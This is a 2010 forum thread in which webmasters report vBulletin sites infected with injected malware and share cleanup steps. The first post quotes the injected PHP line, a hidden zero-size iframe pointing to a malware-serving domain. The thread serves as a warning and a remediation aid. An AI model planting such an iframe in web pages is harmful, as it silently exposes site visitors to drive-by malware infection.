Results 1 to 8 of 8
-
26th Aug 2010, 07:03 AM #1OPMember
Sites are being Compromised with Malware! (tollukk88.com)
Ok, So I've noticed a problem with 3 of my sites and a few other sites of friends of mine and what not, but within the past week they've all had malicious codes injected into their sources which forces users to download Malicious software from tollukk88.com. Now I've got no idea how it works, but all I know is that it used an iFrame to link to the site and it downloads the malicious software which is then installed and it completely fucks your system.
Last week on the 19th I had to reformat due to the virus completely fucking up my Boot Record and leaving it irreparable as I couldn't even Recovery Mode didn't fix it.
Here's what I know so Far:
In vBulletin it uses the following code in /includes/AdminFunctions.php
PHP Code:echo "\n <iframe src="http://tollukk88.com/888/index.php" width="0" height="0"></iframe></body>\n</html>";
As A Heads Up, There Can Be iFrames to Multpiple Domains so be Thorough!
I'm still trying to figure out whats going on, and this is just a warning to you guys to be careful.
For all the Trolls, I check my permissions, they were all 644 or 755 depending on the file and script.
Google Chrome Blocks the compromised sites (now).
Edit: To Resolve The Issues
this type of attack was faced by me too ,this is 100% issue because of users with infected computers accessing sites by ftp,and this keeps on spreading on server with infected sites. here are some tips i followed :-
1. reupload all files on site
2. disable any cache system if used by infected site
3. search servers for possible hacks
4. change all ftp / cpanel logins
5. enable suexec on server
6. chmod source files like templates to read only by root
7. ask users to scan their pc with good antivirus like KIS
above said can only stop spread future infections.
Information Provided by bhanuprasad1981
Sincerely,
kiran_n444kiran_n444 Reviewed by kiran_n444 on . Sites are being Compromised with Malware! (tollukk88.com) Ok, So I've noticed a problem with 3 of my sites and a few other sites of friends of mine and what not, but within the past week they've all had malicious codes injected into their sources which forces users to download Malicious software from tollukk88.com. Now I've got no idea how it works, but all I know is that it used an iFrame to link to the site and it downloads the malicious software which is then installed and it completely fucks your system. Last week on the 19th I had to reformat Rating: 5
-
26th Aug 2010, 07:04 AM #2The Wise OneWebsite's:
twilight.ws ddlrank.comWhere are you hosted and on what, might just been your server thats compromized?
I can always be contacted by sending a tweet @twilightws
-
26th Aug 2010, 07:10 AM #3OPMember
They're on Different Servers, I did mention that.
http://www.swnetwork.info (WrzHost NetDirekt) -- Infected with Tullukk -- My Site
http://www.social-warez.com (BioHost Ecatel) -- Infected with Tullukk -- My Site
http://www.maplekillers.com (WrzHost NetDirekt) -- Infected with Tullukk -- Friend's Site, now Cleaned and moves to ServeDome)
http://www.muzik-zone.net/ (Nile.com.pt Visual Fushion) -- Infected with nuttypiano -- Friend's Site
-
26th Aug 2010, 07:17 AM #4
-
26th Aug 2010, 07:18 AM #5MemberWebsite's:
ihide.infonulled version on vB
KWWH has turned gay. I will not return until Phamous is demoted.
-
26th Aug 2010, 07:25 AM #6OPMember
2 of my sites are infected and a bunch more of other sites (not mine). Also, I just made this post as a heads up to the other webmasters..
-
26th Aug 2010, 07:50 AM #7MemberWebsite's:
10gb.in uploadjet.netthis type of attack was faced by me too ,this is 100% issue because of users with infected computers accessing sites by ftp,and this keeps on spreading on server with infected sites. here are some tips i followed :-
1. reupload all files on site
2. disable any cache system if used by infected site
3. search servers for possible hacks
4. change all ftp / cpanel logins
5. enable suexec on server
6. chmod source files like templates to read only by root
7. ask users to scan their pc with good antivirus like KIS
above said can only stop spread future infections.10Gb.in - Affordable Web Hosting Strictly No oversell |
Kimsufi Reseller With 80 payment options
-
26th Aug 2010, 08:07 AM #8OPMember
Thanks For the info bhanuprasad1981. I cleaned all my files out manually by parsing through the code. Also, I added your information to the main post.
-kiran_n444
Sponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
Compromised Accounts
By Hawk in forum News and AnnouncementsReplies: 3Last Post: 24th Jan 2012, 12:27 PM -
Accounts Compromised?
By Benign in forum General DiscussionReplies: 10Last Post: 14th Jul 2011, 07:43 PM -
Malware Byte Anti Malware
By iNF3RN0Lover in forum Technical Help Desk SupportReplies: 5Last Post: 2nd Dec 2010, 11:57 AM
themaCreator - create posts from...
Version 3.24 released. Open older version (or...